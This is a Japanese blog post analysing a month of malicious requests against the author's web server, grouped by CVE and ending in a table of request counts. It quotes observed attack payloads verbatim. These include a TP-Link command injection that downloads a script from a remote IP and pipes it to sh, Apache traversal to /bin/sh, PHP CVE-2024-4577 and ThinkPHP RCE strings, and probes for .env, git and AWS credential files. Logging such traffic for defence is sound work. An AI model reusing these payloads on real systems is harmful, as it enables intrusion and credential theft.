webサーバのログの分析2024 10月分

2024-11-18 技術系

公開している web サーバのログから通常のアクセスではない通信について分析しました。

多かったリクエスト

ログイン画面へのアクセス

どのサービス化までは特定できませんでしたが、ブルートフォース目的のログイン画面へのアクセスがありました。

/admin/assets/js/views/login.js

wordpressのログイン画面へのアクセスもありました。

/wp-login.php 

TP-Link製ルータArcher AX21の脆弱性(CVE-2023-1389)を狙った攻撃

2023年6月度 MBSD-SOCの検知傾向トピックス | 技術者ブログ | 三井物産セキュアディレクション株式会社

/cgi-bin/luci/;stok=/locale
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60)

PHPUnitのevalをリモート実行

PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信

JVNDB-2017-005280 - JVN iPedia - 脆弱性対策情報データベース

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php                     
/vendor/phpunit/src/Util/PHP/eval-stdin.php                         
/vendor/phpunit/Util/PHP/eval-stdin.php                             
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php          
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php                      
/phpunit/src/Util/PHP/eval-stdin.php                                
/phpunit/phpunit/src/Util/PHP/eval-stdin.php                        
/phpunit/phpunit/Util/PHP/eval-stdin.php                            
/phpunit/Util/PHP/eval-stdin.php                                    
/lib/phpunit/src/Util/PHP/eval-stdin.php                            
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php                    
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php                        
/lib/phpunit/Util/PHP/eval-stdin.php                                
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php            
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php             
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php             
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php              
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php           
/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php           
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php         
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php            
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php          
/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php           
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php             
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php         
/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php            
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php             
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php             
/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php            
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php          
/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php            
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php             
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php             
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php           
/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php              

Apacheのパストラバーサルの脆弱性 (CVE-2021-41773、CVE-2021-42013)を利用したシェルの実行

普通にパストラバーサルを試す攻撃がありました。

Apache HTTP Serverのディレクトリトラバーサル脆弱性_CVE-2021-41773_検証 #Apache_http_server - Qiita

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

PHPの脆弱性(CVE-2024-4577)を狙う攻撃

公開からわずか 1 日後に発生した CVE-2024-4577 の悪用
PHPの脆弱性(CVE-2024-4577)を狙う攻撃について | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構

/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input

Cisco 製 Cisco IOS XE などのネットワーク機器の Web UI の脆弱性

下記の記事のようなネットワーク機器のWeb UIにアクセスを試みる通信だと思われます。
Cisco 製 Cisco IOS XE の Web UI の脆弱性について(CVE-2023-20198 等) | 情報セキュリティ | IPA 独立行政法人 情報処理推進機構

/webui/

GeoServerの脆弱性

GeoServer の深刻な脆弱性 CVE-2023-35042 が FIX:RCE 攻撃が観測されている – IoT OT Security News

/geoserver/web/

Spring Frameworkの脆弱性

Spring FrameworkのSpring Cloud Gatewayという機能の脆弱性に関する通信みたいです。
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability

/actuator/gateway/routes

Faradayの製品の脆弱性

NVD - cve-2024-4584
CVE-2024-4584 Faraday GM8181/GM828x command_port.ini 情報の漏洩

/command_port.ini

phpinfo

/_profiler/phpinfo
/app_dev.php/_profiler/phpinfo

不審な通信の一覧

uri count
/.env 632
/sw.js 408
/admin/assets/js/views/login.js 301
/cgi-bin/luci/;stok=/locale 237
/ads.txt 207
mstshash=Administr 194
* 158
/.git/config 151
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 150
\x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=’:\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0 133
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh 121
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh 113
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input 108
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php 107
/vendor/phpunit/src/Util/PHP/eval-stdin.php 106
/vendor/phpunit/Util/PHP/eval-stdin.php 106
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 105
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php 105
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.31%2Ft%7Csh%3B%60) 104
/phpunit/src/Util/PHP/eval-stdin.php 103
/phpunit/phpunit/src/Util/PHP/eval-stdin.php 103
/phpunit/phpunit/Util/PHP/eval-stdin.php 103
/phpunit/Util/PHP/eval-stdin.php 102
/lib/phpunit/src/Util/PHP/eval-stdin.php 102
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php 102
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php 102
/lib/phpunit/Util/PHP/eval-stdin.php 102
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/sellers.json 101
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello 101
/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello 101
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php 101
/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 101
/index.php?lang=../../../../../../../../tmp/index1 100
/wp-login.php 98
/app-ads.txt 96
/login.rsp 86
/.well-known/traffic-advice 79
/index.xml 70
/containers/json 67
//.env 62
/webui/ 61
/geoserver/web/ 60
/actuator/gateway/routes 59
/api/.env 54
/app/.env 49
/command_port.ini 46
/.env.production 45
/backend/.env 43
//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 43
//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js 41
/.json 41
/config.json 36
/admin/.env 36
/app_dev.php/_profiler/open?file=app/config/parameters.yml 34
/_profiler/phpinfo 32
/manifest.js 31
/t4 29
/.env.prod 29
/info.php 28
/demo/.env 28
/staging/.env 27
/shell?cd+/tmp;rm+-rf+*;wget+ 27
/debug/default/view?panel=config 27
/.env.bak 27
/library/.env 26
/.env.example 26
/dns-query 23
/HNAP1/ 23
/.well-known/security.txt 23
/wp 22
/wordpress 22
/public/.env 22
/post/wp-login.php 22
/new 22
/core/.env 22
/config/.env 22
/app_dev.php/_profiler/phpinfo 22
/phpinfo.php 21
/old 21
/main 21
/infos/ 21
/info/ 21
/home 21
/bk 21
/bc 21
/backup 21
/apps/.env 21
/web/.env 19
/vendor/.env 19
/laravel/.env 19
/.env.dev 19
/actuator/health 18
/HNAP1 18
/server-status 17
/sdk 17
/index.php 17
//sftp.json 17
//sftp-config.json 17
/web/debug/default/view 16
/tool/view/phpinfo.view.php 16
/frontend/web/debug/default/view 16
/dev/.env 16
/data/.env 16
/config/aws.yml 16
/.env.save 16
/.DS_Store 16
/pinfo.php 15
/login.action 15
/api/geojson?url=file:///etc/hosts 15
/aab8 15
/.env~ 15
/.env.stage 15
/telescope/requests 14
/s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties 14
/owa/auth/logon.aspx 14
/owa/ 14
/login 14
/infophp.php 14
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 14
/cgi-bin/authLogin.cgi 14
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts 14
/aaa9 14
/.config.yaml 14
/.aws/credentials 14
/v2/_catalog 13
/owa/auth/x.js 13
/idx_config/ 13
/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage 13
/autodiscover/autodiscover.json?@zdi/Powershell 13
/about/site_icons/icon-192x192.png 13
//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js 13
//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js 13
//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js 13
/.well-known/assetlinks.json 13
/.well-known/apple-app-site-association 13
/.env.development 13
/webui 12
/user 12
/resolve?name=example.com&type=A 12
/resolve 12
/query?name=example.com&type=A 12
/query 12
/media/.env 12
/manager/html 12
/human.aspx 12
/dns-query?name=example.com&type=A 12
/client/.env 12
/aws.yml 12
/about 12
/.vscode/.env 12
/.gitlab-ci/.env 12
/.env.test 12
7 11
/version 11
/v2/.env 11
/static/.env 11
/stag/.env 11
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ 11
/solr/admin/info/system 11
/solr/admin/cores?action=STATUS&wt=json 11
/query?q=SHOW+DIAGNOSTICS 11
/portal/redlion 11
/new/.env 11
/misc/.env 11
/log/.env 11
/index.asp 11
/images/.env 11
/html/.env 11
/home/.env 11
/exapi/.env 11
/evox/about 11
/docker/.env 11
/doc/.env 11
/cp/.env 11
/client_secrets.json 11
/aab9 11
/.env.production.local 11
/.env.old 11
/.env.local 11
/.env.development.local 11
/teorema505?t=1 10
/templates/.env 10
/phpinfos.php 10
/locally/.env 10
/localhost/.env 10
/druid/index.html 10

follow us in feedly

comments powered by Disqus

関連記事

新着記事